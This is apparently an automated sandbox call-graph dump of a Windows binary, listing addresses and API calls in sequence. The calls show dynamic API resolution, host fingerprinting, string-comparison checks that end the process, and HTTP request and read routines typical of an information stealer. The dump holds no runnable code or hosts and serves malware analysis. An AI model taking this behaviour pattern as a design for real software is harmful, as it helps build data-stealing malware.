14161->14162 14163 1c45c0 2 API calls 14162->14163 14164 1c38ac 14163->14164 14165 1c45c0 2 API calls 14164->14165 14166 1c38c5 14165->14166 14167 1c45c0 2 API calls 14166->14167 14168 1c38de 14167->14168 14169 1c45c0 2 API calls 14168->14169 14170 1c38f7 14169->14170 14171 1c45c0 2 API calls 14170->14171 14172 1c3910 14171->14172 14173 1c45c0 2 API calls 14172->14173 14174 1c3929 14173->14174 14175 1c45c0 2 API calls 14174->14175 14176 1c3942 14175->14176 14177 1c45c0 2 API calls 14176->14177 14178 1c395b 14177->14178 14179 1c45c0 2 API calls 14178->14179 14180 1c3974 14179->14180 14181 1c45c0 2 API calls 14180->14181 14182 1c398d 14181->14182 14183 1c45c0 2 API calls 14182->14183 14184 1c39a6 14183->14184 14185 1c45c0 2 API calls 14184->14185 14186 1c39bf 14185->14186 14187 1c45c0 2 API calls 14186->14187 14188 1c39d8 14187->14188 14189 1c45c0 2 API calls 14188->14189 14190 1c39f1 14189->14190 14191 1c45c0 2 API calls 14190->14191 14192 1c3a0a 14191->14192 14193 1c45c0 2 API calls 14192->14193 14194 1c3a23 14193->14194 14195 1c45c0 2 API calls 14194->14195 14196 1c3a3c 14195->14196 14197 1c45c0 2 API calls 14196->14197 14198 1c3a55 14197->14198 14199 1c45c0 2 API calls 14198->14199 14200 1c3a6e 14199->14200 14201 1c45c0 2 API calls 14200->14201 14202 1c3a87 14201->14202 14203 1c45c0 2 API calls 14202->14203 14204 1c3aa0 14203->14204 14205 1c45c0 2 API calls 14204->14205 14206 1c3ab9 14205->14206 14207 1c45c0 2 API calls 14206->14207 14208 1c3ad2 14207->14208 14209 1c45c0 2 API calls 14208->14209 14210 1c3aeb 14209->14210 14211 1c45c0 2 API calls 14210->14211 14212 1c3b04 14211->14212 14213 1c45c0 2 API calls 14212->14213 14214 1c3b1d 14213->14214 14215 1c45c0 2 API calls 14214->14215 14216 1c3b36 14215->14216 14217 1c45c0 2 API calls 14216->14217 14218 1c3b4f 14217->14218 14219 1c45c0 2 API calls 14218->14219 14220 1c3b68 14219->14220 14221 1c45c0 2 API calls 14220->14221 14222 1c3b81 14221->14222 14223 1c45c0 2 API calls 14222->14223 14224 1c3b9a 14223->14224 14225 1c45c0 2 API calls 14224->14225 14226 1c3bb3 14225->14226 14227 1c45c0 2 API calls 14226->14227 14228 1c3bcc 14227->14228 14229 1c45c0 2 API calls 14228->14229 14230 1c3be5 14229->14230 14231 1c45c0 2 API calls 14230->14231 14232 1c3bfe 14231->14232 14233 1c45c0 2 API calls 14232->14233 14234 1c3c17 14233->14234 14235 1c45c0 2 API calls 14234->14235 14236 1c3c30 14235->14236 14237 1c45c0 2 API calls 14236->14237 14238 1c3c49 14237->14238 14239 1c45c0 2 API calls 14238->14239 14240 1c3c62 14239->14240 14241 1c45c0 2 API calls 14240->14241 14242 1c3c7b 14241->14242 14243 1c45c0 2 API calls 14242->14243 14244 1c3c94 14243->14244 14245 1c45c0 2 API calls 14244->14245 14246 1c3cad 14245->14246 14247 1c45c0 2 API calls 14246->14247 14248 1c3cc6 14247->14248 14249 1c45c0 2 API calls 14248->14249 14250 1c3cdf 14249->14250 14251 1c45c0 2 API calls 14250->14251 14252 1c3cf8 14251->14252 14253 1c45c0 2 API calls 14252->14253 14254 1c3d11 14253->14254 14255 1c45c0 2 API calls 14254->14255 14256 1c3d2a 14255->14256 14257 1c45c0 2 API calls 14256->14257 14258 1c3d43 14257->14258 14259 1c45c0 2 API calls 14258->14259 14260 1c3d5c 14259->14260 14261 1c45c0 2 API calls 14260->14261 14262 1c3d75 14261->14262 14263 1c45c0 2 API calls 14262->14263 14264 1c3d8e 14263->14264 14265 1c45c0 2 API calls 14264->14265 14266 1c3da7 14265->14266 14267 1c45c0 2 API calls 14266->14267 14268 1c3dc0 14267->14268 14269 1c45c0 2 API calls 14268->14269 14270 1c3dd9 14269->14270 14271 1c45c0 2 API calls 14270->14271 14272 1c3df2 14271->14272 14273 1c45c0 2 API calls 14272->14273 14274 1c3e0b 14273->14274 14275 1c45c0 2 API calls 14274->14275 14276 1c3e24 14275->14276 14277 1c45c0 2 API calls 14276->14277 14278 1c3e3d 14277->14278 14279 1c45c0 2 API calls 14278->14279 14280 1c3e56 14279->14280 14281 1c45c0 2 API calls 14280->14281 14282 1c3e6f 14281->14282 14283 1c45c0 2 API calls 14282->14283 14284 1c3e88 14283->14284 14285 1c45c0 2 API calls 14284->14285 14286 1c3ea1 14285->14286 14287 1c45c0 2 API calls 14286->14287 14288 1c3eba 14287->14288 14289 1c45c0 2 API calls 14288->14289 14290 1c3ed3 14289->14290 14291 1c45c0 2 API calls 14290->14291 14292 1c3eec 14291->14292 14293 1c45c0 2 API calls 14292->14293 14294 1c3f05 14293->14294 14295 1c45c0 2 API calls 14294->14295 14296 1c3f1e 14295->14296 14297 1c45c0 2 API calls 14296->14297 14298 1c3f37 14297->14298 14299 1c45c0 2 API calls 14298->14299 14300 1c3f50 14299->14300 14301 1c45c0 2 API calls 14300->14301 14302 1c3f69 14301->14302 14303 1c45c0 2 API calls 14302->14303 14304 1c3f82 14303->14304 14305 1c45c0 2 API calls 14304->14305 14306 1c3f9b 14305->14306 14307 1c45c0 2 API calls 14306->14307 14308 1c3fb4 14307->14308 14309 1c45c0 2 API calls 14308->14309 14310 1c3fcd 14309->14310 14311 1c45c0 2 API calls 14310->14311 14312 1c3fe6 14311->14312 14313 1c45c0 2 API calls 14312->14313 14314 1c3fff 14313->14314 14315 1c45c0 2 API calls 14314->14315 14316 1c4018 14315->14316 14317 1c45c0 2 API calls 14316->14317 14318 1c4031 14317->14318 14319 1c45c0 2 API calls 14318->14319 14320 1c404a 14319->14320 14321 1c45c0 2 API calls 14320->14321 14322 1c4063 14321->14322 14323 1c45c0 2 API calls 14322->14323 14324 1c407c 14323->14324 14325 1c45c0 2 API calls 14324->14325 14326 1c4095 14325->14326 14327 1c45c0 2 API calls 14326->14327 14328 1c40ae 14327->14328 14329 1c45c0 2 API calls 14328->14329 14330 1c40c7 14329->14330 14331 1c45c0 2 API calls 14330->14331 14332 1c40e0 14331->14332 14333 1c45c0 2 API calls 14332->14333 14334 1c40f9 14333->14334 14335 1c45c0 2 API calls 14334->14335 14336 1c4112 14335->14336 14337 1c45c0 2 API calls 14336->14337 14338 1c412b 14337->14338 14339 1c45c0 2 API calls 14338->14339 14340 1c4144 14339->14340 14341 1c45c0 2 API calls 14340->14341 14342 1c415d 14341->14342 14343 1c45c0 2 API calls 14342->14343 14344 1c4176 14343->14344 14345 1c45c0 2 API calls 14344->14345 14346 1c418f 14345->14346 14347 1c45c0 2 API calls 14346->14347 14348 1c41a8 14347->14348 14349 1c45c0 2 API calls 14348->14349 14350 1c41c1 14349->14350 14351 1c45c0 2 API calls 14350->14351 14352 1c41da 14351->14352 14353 1c45c0 2 API calls 14352->14353 14354 1c41f3 14353->14354 14355 1c45c0 2 API calls 14354->14355 14356 1c420c 14355->14356 14357 1c45c0 2 API calls 14356->14357 14358 1c4225 14357->14358 14359 1c45c0 2 API calls 14358->14359 14360 1c423e 14359->14360 14361 1c45c0 2 API calls 14360->14361 14362 1c4257 14361->14362 14363 1c45c0 2 API calls 14362->14363 14364 1c4270 14363->14364 14365 1c45c0 2 API calls 14364->14365 14366 1c4289 14365->14366 14367 1c45c0 2 API calls 14366->14367 14368 1c42a2 14367->14368 14369 1c45c0 2 API calls 14368->14369 14370 1c42bb 14369->14370 14371 1c45c0 2 API calls 14370->14371 14372 1c42d4 14371->14372 14373 1c45c0 2 API calls 14372->14373 14374 1c42ed 14373->14374 14375 1c45c0 2 API calls 14374->14375 14376 1c4306 14375->14376 14377 1c45c0 2 API calls 14376->14377 14378 1c431f 14377->14378 14379 1c45c0 2 API calls 14378->14379 14380 1c4338 14379->14380 14381 1c45c0 2 API calls 14380->14381 14382 1c4351 14381->14382 14383 1c45c0 2 API calls 14382->14383 14384 1c436a 14383->14384 14385 1c45c0 2 API calls 14384->14385 14386 1c4383 14385->14386 14387 1c45c0 2 API calls 14386->14387 14388 1c439c 14387->14388 14389 1c45c0 2 API calls 14388->14389 14390 1c43b5 14389->14390 14391 1c45c0 2 API calls 14390->14391 14392 1c43ce 14391->14392 14393 1c45c0 2 API calls 14392->14393 14394 1c43e7 14393->14394 14395 1c45c0 2 API calls 14394->14395 14396 1c4400 14395->14396 14397 1c45c0 2 API calls 14396->14397 14398 1c4419 14397->14398 14399 1c45c0 2 API calls 14398->14399 14400 1c4432 14399->14400 14401 1c45c0 2 API calls 14400->14401 14402 1c444b 14401->14402 14403 1c45c0 2 API calls 14402->14403 14404 1c4464 14403->14404 14405 1c45c0 2 API calls 14404->14405 14406 1c447d 14405->14406 14407 1c45c0 2 API calls 14406->14407 14408 1c4496 14407->14408 14409 1c45c0 2 API calls 14408->14409 14410 1c44af 14409->14410 14411 1c45c0 2 API calls 14410->14411 14412 1c44c8 14411->14412 14413 1c45c0 2 API calls 14412->14413 14414 1c44e1 14413->14414 14415 1c45c0 2 API calls 14414->14415 14416 1c44fa 14415->14416 14417 1c45c0 2 API calls 14416->14417 14418 1c4513 14417->14418 14419 1c45c0 2 API calls 14418->14419 14420 1c452c 14419->14420 14421 1c45c0 2 API calls 14420->14421 14422 1c4545 14421->14422 14423 1c45c0 2 API calls 14422->14423 14424 1c455e 14423->14424 14425 1c45c0 2 API calls 14424->14425 14426 1c4577 14425->14426 14427 1c45c0 2 API calls 14426->14427 14428 1c4590 14427->14428 14429 1c45c0 2 API calls 14428->14429 14430 1c45a9 14429->14430 14431 1d9c10 14430->14431 14432 1da036 8 API calls 14431->14432 14433 1d9c20 43 API calls 14431->14433 14434 1da0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14432->14434 14435 1da146 14432->14435 14433->14432 14434->14435 14436 1da216 14435->14436 14437 1da153 8 API calls 14435->14437 14438 1da21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14436->14438 14439 1da298 14436->14439 14437->14436 14438->14439 14440 1da2a5 6 API calls 14439->14440 14441 1da337 14439->14441 14440->14441 14442 1da41f 14441->14442 14443 1da344 9 API calls 14441->14443 14444 1da428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14442->14444 14445 1da4a2 14442->14445 14443->14442 14444->14445 14446 1da4dc 14445->14446 14447 1da4ab GetProcAddress GetProcAddress 14445->14447 14448 1da515 14446->14448 14449 1da4e5 GetProcAddress GetProcAddress 14446->14449 14447->14446 14450 1da612 14448->14450 14451 1da522 10 API calls 14448->14451 14449->14448 14452 1da67d 14450->14452 14453 1da61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14450->14453 14451->14450 14454 1da69e 14452->14454 14455 1da686 GetProcAddress 14452->14455 14453->14452 14456 1d5ca3 14454->14456 14457 1da6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14454->14457 14455->14454 14458 1c1590 14456->14458 14457->14456 15579 1c1670 14458->15579 14461 1da7a0 lstrcpy 14462 1c15b5 14461->14462 14463 1da7a0 lstrcpy 14462->14463 14464 1c15c7 14463->14464 14465 1da7a0 lstrcpy 14464->14465 14466 1c15d9 14465->14466 14467 1da7a0 lstrcpy 14466->14467 14468 1c1663 14467->14468 14469 1d5510 14468->14469 14470 1d5521 14469->14470 14471 1da820 2 API calls 14470->14471 14472 1d552e 14471->14472 14473 1da820 2 API calls 14472->14473 14474 1d553b 14473->14474 14475 1da820 2 API calls 14474->14475 14476 1d5548 14475->14476 14477 1da740 lstrcpy 14476->14477 14478 1d5555 14477->14478 14479 1da740 lstrcpy 14478->14479 14480 1d5562 14479->14480 14481 1da740 lstrcpy 14480->14481 14482 1d556f 14481->14482 14483 1da740 lstrcpy 14482->14483 14495 1d557c 14483->14495 14484 1da740 lstrcpy 14484->14495 14485 1da7a0 lstrcpy 14485->14495 14486 1d5643 StrCmpCA 14486->14495 14487 1d56a0 StrCmpCA 14488 1d57dc 14487->14488 14487->14495 14489 1da8a0 lstrcpy 14488->14489 14490 1d57e8 14489->14490 14492 1da820 2 API calls 14490->14492 14491 1da820 lstrlen lstrcpy 14491->14495 14493 1d57f6 14492->14493 14496 1da820 2 API calls 14493->14496 14494 1d5856 StrCmpCA 14494->14495 14497 1d5991 14494->14497 14495->14484 14495->14485 14495->14486 14495->14487 14495->14491 14495->14494 14501 1c1590 lstrcpy 14495->14501 14505 1d5a0b StrCmpCA 14495->14505 14506 1d52c0 25 API calls 14495->14506 14512 1da8a0 lstrcpy 14495->14512 14518 1d578a StrCmpCA 14495->14518 14522 1d593f StrCmpCA 14495->14522 14523 1d51f0 20 API calls 14495->14523 14498 1d5805 14496->14498 14499 1da8a0 lstrcpy 14497->14499 14500 1c1670 lstrcpy 14498->14500 14502 1d599d 14499->14502 14521 1d5811 14500->14521 14501->14495 14503 1da820 2 API calls 14502->14503 14504 1d59ab 14503->14504 14507 1da820 2 API calls 14504->14507 14508 1d5a28 14505->14508 14509 1d5a16 Sleep 14505->14509 14506->14495 14510 1d59ba 14507->14510 14511 1da8a0 lstrcpy 14508->14511 14509->14495 14513 1c1670 lstrcpy 14510->14513 14514 1d5a34 14511->14514 14512->14495 14513->14521 14515 1da820 2 API calls 14514->14515 14516 1d5a43 14515->14516 14517 1da820 2 API calls 14516->14517 14519 1d5a52 14517->14519 14518->14495 14520 1c1670 lstrcpy 14519->14520 14520->14521 14521->13576 14522->14495 14523->14495 14525 1d754c 14524->14525 14526 1d7553 GetVolumeInformationA 14524->14526 14525->14526 14527 1d7591 14526->14527 14528 1d75fc GetProcessHeap RtlAllocateHeap 14527->14528 14529 1d7619 14528->14529 14530 1d7628 wsprintfA 14528->14530 14531 1da740 lstrcpy 14529->14531 14532 1da740 lstrcpy 14530->14532 14533 1d5da7 14531->14533 14532->14533 14533->13597 14535 1da7a0 lstrcpy 14534->14535 14536 1c4899 14535->14536 15588 1c47b0 14536->15588 14538 1c48a5 14539 1da740 lstrcpy 14538->14539 14540 1c48d7 14539->14540 14541 1da740 lstrcpy 14540->14541 14542 1c48e4 14541->14542 14543 1da740 lstrcpy 14542->14543 14544 1c48f1 14543->14544 14545 1da740 lstrcpy 14544->14545 14546 1c48fe 14545->14546 14547 1da740 lstrcpy 14546->14547 14548 1c490b InternetOpenA StrCmpCA 14547->14548 14549 1c4944 14548->14549 14550 1c4ecb InternetCloseHandle 14549->14550 15594 1d8b60 14549->15594 14552 1c4ee8 14550->14552 15609 1c9ac0 CryptStringToBinaryA 14552->15609 14553 1c4963 15602 1da920 14553->15602 14556 1c4976 14558 1da8a0 lstrcpy 14556->14558 14564 1c497f 14558->14564 14559 1da820 2 API calls 14560 1c4f05 14559->14560 14562 1da9b0 4 API calls 14560->14562 14561 1c4f27 codecvt 14566 1da7a0 lstrcpy 14561->14566 14563 1c4f1b 14562->14563 14565 1da8a0 lstrcpy 14563->14565 14567 1da9b0 4 API calls 14564->14567 14565->14561 14578 1c4f57 14566->14578 14568 1c49a9 14567->14568 14569 1da8a0 lstrcpy 14568->14569 14570 1c49b2 14569->14570 14571 1da9b0 4 API calls 14570->14571 14572 1c49d1 14571->14572 14573 1da8a0 lstrcpy 14572->14573 14574 1c49da 14573->14574 14575 1da920 3 API calls 14574->14575 14576 1c49f8 14575->14576 14577 1da8a0 lstrcpy 14576->14577 14579 1c4a01 14577->14579 14578->13600 14580 1da9b0 4 API calls 14579->14580 14581 1c4a20 14580->14581 14582 1da8a0 lstrcpy 14581->14582 14583 1c4a29 14582->14583 14584 1da9b0 4 API calls 14583->14584 14585 1c4a48 14584->14585 14586 1da8a0 lstrcpy 14585->14586 14587 1c4a51 14586->14587 14588 1da9b0 4 API calls 14587->14588 14589 1c4a7d 14588->14589 14590 1da920 3 API calls 14589->14590 14591 1c4a84 14590->14591 14592 1da8a0 lstrcpy 14591->14592 14593 1c4a8d 14592->14593 14594 1c4aa3 InternetConnectA 14593->14594 14594->14550 14595 1c4ad3 HttpOpenRequestA 14594->14595 14597 1c4ebe InternetCloseHandle 14595->14597 14598 1c4b28 14595->14598 14597->14550 14599 1da9b0 4 API calls 14598->14599 14600 1c4b3c 14599->14600 14601 1da8a0 lstrcpy 14600->14601 14602 1c4b45 14601->14602 14603 1da920 3 API calls 14602->14603 14604 1c4b63 14603->14604 14605 1da8a0 lstrcpy 14604->14605 14606 1c4b6c 14605->14606 14607 1da9b0 4 API calls 14606->14607 14608 1c4b8b 14607->14608 14609 1da8a0 lstrcpy 14608->14609 14610 1c4b94 14609->14610 14611 1da9b0 4 API calls 14610->14611 14612 1c4bb5 14611->14612 14613 1da8a0 lstrcpy 14612->14613 14614 1c4bbe 14613->14614 14615 1da9b0 4 API calls 14614->14615 14616 1c4bde 14615->14616 14617 1da8a0 lstrcpy 14616->14617 14618 1c4be7 14617->14618 14619 1da9b0 4 API calls 14618->14619 14620 1c4c06 14619->14620 14621 1da8a0 lstrcpy 14620->14621 14622 1c4c0f 14621->14622 14623 1da920 3 API calls 14622->14623 14624 1c4c2d 14623->14624 14625 1da8a0 lstrcpy 14624->14625 14626 1c4c36 14625->14626 14627 1da9b0 4 API calls 14626->14627 14628 1c4c55 14627->14628 14629 1da8a0 lstrcpy 14628->14629 14630 1c4c5e 14629->14630 14631 1da9b0 4 API calls 14630->14631 14632 1c4c7d 14631->14632 14633 1da8a0 lstrcpy 14632->14633 14634 1c4c86 14633->14634 14635 1da920 3 API calls 14634->14635 14636 1c4ca4 14635->14636 14637 1da8a0 lstrcpy 14636->14637 14638 1c4cad 14637->14638 14639 1da9b0 4 API calls 14638->14639 14640 1c4ccc 14639->14640 14641 1da8a0 lstrcpy 14640->14641 14642 1c4cd5 14641->14642 14643 1da9b0 4 API calls 14642->14643 14644 1c4cf6 14643->14644 14645 1da8a0 lstrcpy 14644->14645 14646 1c4cff 14645->14646 14647 1da9b0 4 API calls 14646->14647 14648 1c4d1f 14647->14648 14649 1da8a0 lstrcpy 14648->14649 14650 1c4d28 14649->14650 14651 1da9b0 4 API calls 14650->14651 14652 1c4d47 14651->14652 14653 1da8a0 lstrcpy 14652->14653 14654 1c4d50 14653->14654 14655 1da920 3 API calls 14654->14655 14656 1c4d6e 14655->14656 14657 1da8a0 lstrcpy 14656->14657 14658 1c4d77 14657->14658 14659 1da740 lstrcpy 14658->14659 14660 1c4d92 14659->14660 14661 1da920 3 API calls 14660->14661 14662 1c4db3 14661->14662 14663 1da920 3 API calls 14662->14663 14664 1c4dba 14663->14664 14665 1da8a0 lstrcpy 14664->14665 14666 1c4dc6 14665->14666 14667 1c4de7 lstrlen 14666->14667 14668 1c4dfa 14667->14668 14669 1c4e03 lstrlen 14668->14669 15608 1daad0 14669->15608 14671 1c4e13 HttpSendRequestA 14672 1c4e32 InternetReadFile 14671->14672 14673 1c4e67 InternetCloseHandle 14672->14673 14678 1c4e5e 14672->14678 14675 1da800 14673->14675 14675->14597 14676 1da9b0 4 API calls 14676->14678 14677 1da8a0 lstrcpy 14677->14678 14678->14672 14678->14673 14678->14676 14678->14677 15615 1daad0 14679->15615 14681 1d17c4 StrCmpCA 14682 1d17cf ExitProcess 14681->14682 14693 1d17d7 14681->14693 14683 1d19c2 14683->13602 14684 1d185d StrCmpCA 14684->14693 14685 1d187f StrCmpCA 14685->14693 14686 1d18f1 StrCmpCA 14686->14693 14687 1d1951 StrCmpCA 14687->14693 14688 1d1970 StrCmpCA 14688->14693 14689 1d1913 StrCmpCA 14689->14693 14690 1d1932 StrCmpCA 14690->14693 14691 1d18ad StrCmpCA 14691->14693 14692 1d18cf StrCmpCA 14692->14693 14693->14683 14693->14684 14693->14685 14693->14686 14693->14687 14693->14688 14693->14689 14693->14690 14693->14691 14693->14692 14694 1da820 lstrlen lstrcpy 14693->14694 14694->14693 14696 1da7a0 lstrcpy 14695->14696 14697 1c5979 14696->14697 14698 1c47b0 2 API calls 14697->14698 14699 1c5985 14698->14699 14700 1da740 lstrcpy 14699->14700 14701 1c59ba 14700->14701 14702 1da740 lstrcpy 14701->14702 14703 1c59c7 14702->14703 14704 1da740 lstrcpy 14703->14704 14705 1c59d4 14704->14705 14706 1da740 lstrcpy 14705->14706 14707 1c59e1 14706->14707 14708 1da740 lstrcpy 14707->14708 14709 1c59ee InternetOpenA StrCmpCA 14708->14709 14710 1c5a1d 14709->14710 14711 1c5fc3 InternetCloseHandle 14710->14711 14712 1d8b60 3 API calls 14710->14712 14713 1c5fe0 14711->14713 14714 1c5a3c 14712->14714 14715 1c9ac0 4 API calls 14713->14715 14716 1da920 3 API calls 14714->14716 14717 1c5fe6 14715->14717 14718 1c5a4f 14716->14718 14720 1da820 2 API calls 14717->14720 14723 1c601f codecvt 14717->14723 14719 1da8a0 lstrcpy 14718->14719 14724 1c5a58 14719->14724 14721 1c5ffd 14720->14721 14722 1da9b0 4 API calls 14721->14722 14725 1c6013 14722->14725 14727 1da7a0 lstrcpy 14723->14727 14728 1da9b0 4 API calls 14724->14728 14726 1da8a0 lstrcpy 14725->14726 14726->14723 14735 1c604f 14727->14735 14729 1c5a82 14728->14729 14730 1da8a0 lstrcpy 14729->14730 14731 1c5a8b 14730->14731 14732 1da9b0 4 API calls 14731->14732 14733 1c5aaa 14732->14733 14734 1da8a0 lstrcpy 14733->14734 14736 1c5ab3 14734->14736 14735->13608 14737 1da920 3 API calls 14736->14737 14738 1c5ad1 14737->14738 14739 1da8a0 lstrcpy 14738->14739 14740 1c5ada 14739->14740 14741 1da9b0 4 API calls 14740->14741 14742 1c5af9 14741->14742 14743 1da8a0 lstrcpy 14742->14743 14744 1c5b02 14743->14744 14745 1da9b0 4 API calls 14744->14745 14746 1c5b21 14745->14746 14747 1da8a0 lstrcpy 14746->14747 14748 1c5b2a 14747->14748 14749 1da9b0 4 API calls 14748->14749 14750 1c5b56 14749->14750 14751 1da920 3 API calls 14750->14751 14752 1c5b5d 14751->14752 14753 1da8a0 lstrcpy 14752->14753 14754 1c5b66 14753->14754 14755 1c5b7c InternetConnectA 14754->14755 14755->14711 14756 1c5bac HttpOpenRequestA 14755->14756 14758 1c5c0b 14756->14758 14759 1c5fb6 InternetCloseHandle 14756->14759 14760 1da9b0 4 API calls 14758->14760 14759->14711 14761 1c5c1f 14760->14761 14762 1da8a0 lstrcpy 14761->14762 14763 1c5c28 14762->14763 14764 1da920 3 API calls 14763->14764 14765 1c5c46 14764->14765 14766 1da8a0 lstrcpy 14765->14766 14767 1c5c4f 14766->14767 14768 1da9b0 4 API calls 14767->14768 14769 1c5c6e 14768->14769 14770 1da8a0 lstrcpy 14769->14770 14771 1c5c77 14770->14771 14772 1da9b0 4 API calls 14771->14772 14773 1c5c98 14772->14773 14774 1da8a0 lstrcpy 14773->14774 14775 1c5ca1 14774->14775 14776 1da9b0 4 API calls 14775->14776 14777 1c5cc1 14776->14777 14778 1da8a0 lstrcpy 14777->14778 14779 1c5cca 14778->14779 14780 1da9b0 4 API calls 14779->14780 14781 1c5ce9 14780->14781 14782 1da8a0 lstrcpy 14781->14782 14783 1c5cf2 14782->14783 14784 1da920 3 API calls 14783->14784 14785 1c5d10 14784->14785 14786 1da8a0 lstrcpy 14785->14786 14787 1c5d19 14786->14787 14788 1da9b0 4 API calls 14787->14788 14789 1c5d38 14788->14789 14790 1da8a0 lstrcpy 14789->14790 14791 1c5d41 14790->14791 14792 1da9b0 4 API calls 14791->14792 14793 1c5d60 14792->14793 14794 1da8a0 lstrcpy 14793->14794 14795 1c5d69 14794->14795 14796 1da920 3 API calls 14795->14796 14797 1c5d87 14796->14797 14798 1da8a0 lstrcpy 14797->14798 14799 1c5d90 14798->14799 14800 1da9b0 4 API calls 14799->14800 14801 1c5daf 14800->14801 14802 1da8a0 lstrcpy 14801->14802 14803 1c5db8 14802->14803 14804 1da9b0 4 API calls 14803->14804 14805 1c5dd9 14804->14805 14806 1da8a0 lstrcpy 14805->14806 14807 1c5de2 14806->14807 14808 1da9b0 4 API calls 14807->14808 14809 1c5e02 14808->14809 14810 1da8a0 lstrcpy 14809->14810 14811 1c5e0b 14810->14811 14812 1da9b0 4 API calls 14811->14812 14813 1c5e2a 14812->14813 14814 1da8a0 lstrcpy 14813->14814 14815 1c5e33 14814->14815 14816 1da920 3 API calls 14815->14816 14817 1c5e54 14816->14817 14818 1da8a0 lstrcpy 14817->14818 14819 1c5e5d 14818->14819 14820 1c5e70 lstrlen 14819->14820 15616 1daad0 14820->15616 14822 1c5e81 lstrlen GetProcessHeap RtlAllocateHeap 15617 1daad0 14822->15617 14824 1c5eae lstrlen 14825 1c5ebe 14824->14825 14826 1c5ed7 lstrlen 14825->14826 14827 1c5ee7 14826->14827 14828 1c5ef0 lstrlen 14827->14828 14829 1c5f03 14828->14829 14830 1c5f1a lstrlen 14829->14830 15618 1daad0 14830->15618 14832 1c5f2a HttpSendRequestA 14833 1c5f35 InternetReadFile 14832->14833 14834 1c5f6a InternetCloseHandle 14833->14834 14838 1c5f61 14833->14838 14834->14759 14836 1da9b0 4 API calls 14836->14838 14837 1da8a0 lstrcpy 14837->14838 14838->14833 14838->14834 14838->14836 14838->14837 14841 1d1077 14839->14841 14840 1d1151 14840->13610 14841->14840 14842 1da820 lstrlen lstrcpy 14841->14842 14842->14841 14848 1d0db7 14843->14848 14844 1d0f17 14844->13618 14845 1d0ea4 StrCmpCA 14845->14848 14846 1d0e27 StrCmpCA 14846->14848 14847 1d0e67 StrCmpCA 14847->14848 14848->14844 14848->14845 14848->14846 14848->14847 14849 1da820 lstrlen lstrcpy 14848->14849 14849->14848 14851 1d0f67 14850->14851 14852 1d1044 14851->14852 14853 1d0fb2 StrCmpCA 14851->14853 14854 1da820 lstrlen lstrcpy 14851->14854 14852->13626 14853->14851 14854->14851 14856 1da740 lstrcpy 14855->14856 14857 1d1a26 14856->14857 14858 1da9b0 4 API calls 14857->14858 14859 1d1a37 14858->14859 14860 1da8a0 lstrcpy 14859->14860 14861 1d1a40 14860->14861 14862 1da9b0 4 API calls 14861->14862 14863 1d1a5b 14862->14863 14864 1da8a0 lstrcpy 14863->14864 14865 1d1a64 14864->14865 14866 1da9b0 4 API calls 14865->14866 14867 1d1a7d 14866->14867 14868 1da8a0 lstrcpy 14867->14868 14869 1d1a86 14868->14869 14870 1da9b0 4 API calls 14869->14870 14871 1d1aa1 14870->14871 14872 1da8a0 lstrcpy 14871->14872 14873 1d1aaa 14872->14873 14874 1da9b0 4 API calls 14873->14874 14875 1d1ac3 14874->14875 14876 1da8a0 lstrcpy 14875->14876 14877 1d1acc 14876->14877 14878 1da9b0 4 API calls 14877->14878 14879 1d1ae7 14878->14879 14880 1da8a0 lstrcpy 14879->14880 14881 1d1af0 14880->14881 14882 1da9b0 4 API calls 14881->14882 14883 1d1b09 14882->14883 14884 1da8a0 lstrcpy 14883->14884 14885 1d1b12 14884->14885 14886 1da9b0 4 API calls 14885->14886 14887 1d1b2d 14886->14887 14888 1da8a0 lstrcpy 14887->14888 14889 1d1b36 14888->14889 14890 1da9b0 4 API calls 14889->14890 14891 1d1b4f 14890->14891 14892 1da8a0 lstrcpy 14891->14892 14893 1d1b58 14892->14893 14894 1da9b0 4 API calls 14893->14894 14895 1d1b76 14894->14895 14896 1da8a0 lstrcpy 14895->14896 14897 1d1b7f 14896->14897 14898 1d7500 6 API calls 14897->14898 14899 1d1b96 14898->14899 14900 1da920 3 API calls 14899->14900 14901 1d1ba9 14900->14901 14902 1da8a0 lstrcpy 14901->14902 14903 1d1bb2 14902->14903 14904 1da9b0 4 API calls 14903->14904 14905 1d1bdc 14904->14905 14906 1da8a0 lstrcpy 14905->14906 14907 1d1be5 14906->14907 14908 1da9b0 4 API calls 14907->14908 14909 1d1c05 14908->14909 14910 1da8a0 lstrcpy 14909->14910 14911 1d1c0e 14910->14911 15619 1d7690 GetProcessHeap RtlAllocateHeap 14911->15619 14914 1da9b0 4 API calls 14915 1d1c2e 14914->14915 14916 1da8a0 lstrcpy 14915->14916 14917 1d1c37 14916->14917 14918 1da9b0 4 API calls 14917->14918 14919 1d1c56 14918->14919 14920 1da8a0 lstrcpy 14919->14920 14921 1d1c5f 14920->14921 14922 1da9b0 4 API calls 14921->14922 14923 1d1c80 14922->14923 14924 1da8a0 lstrcpy 14923->14924 14925 1d1c89 14924->14925 15626 1d77c0 GetCurrentProcess IsWow64Process 14925->15626 14928 1da9b0 4 API calls 14929 1d1ca9 14928->14929 14930 1da8a0 lstrcpy 14929->14930 14931 1d1cb2 14930->14931 14932 1da9b0 4 API calls 14931->14932 14933 1d1cd1 14932->14933 14934 1da8a0 lstrcpy 14933->14934 14935 1d1cda 14934->14935 14936 1da9b0 4 API calls 14935->14936 14937 1d1cfb 14936->14937 14938 1da8a0 lstrcpy 14937->14938 14939 1d1d04 14938->14939 14940 1d7850 3 API calls 14939->14940 14941 1d1d14 14940->14941 14942 1da9b0 4 API calls 14941->14942 14943 1d1d24 14942->14943 14944 1da8a0 lstrcpy 14943->14944 14945 1d1d2d 14944->14945 14946 1da9b0 4 API calls 14945->14946 14947 1d1d4c 14946->14947 14948 1da8a0 lstrcpy 14947->14948 14949 1d1d55 14948->14949 14950 1da9b0 4 API calls 14949->14950 14951 1d1d75 14950->14951 14952 1da8a0 lstrcpy 14951->14952 14953 1d1d7e 14952->14953 14954 1d78e0 3 API calls 14953->14954 14955 1d1d8e 14954->14955 14956 1da9b0 4 API calls 14955->14956 14957 1d1d9e 14956->14957 14958 1da8a0 lstrcpy 14957->14958 14959 1d1da7 14958->14959 14960 1da9b0 4 API calls 14959->14960 14961 1d1dc6 14960->14961 14962 1da8a0 lstrcpy 14961->14962 14963 1d1dcf 14962->14963 14964 1da9b0 4 API calls 14963->14964 14965 1d1df0 14964->14965 14966 1da8a0 lstrcpy 14965->14966 14967 1d1df9 14966->14967 15628 1d7980 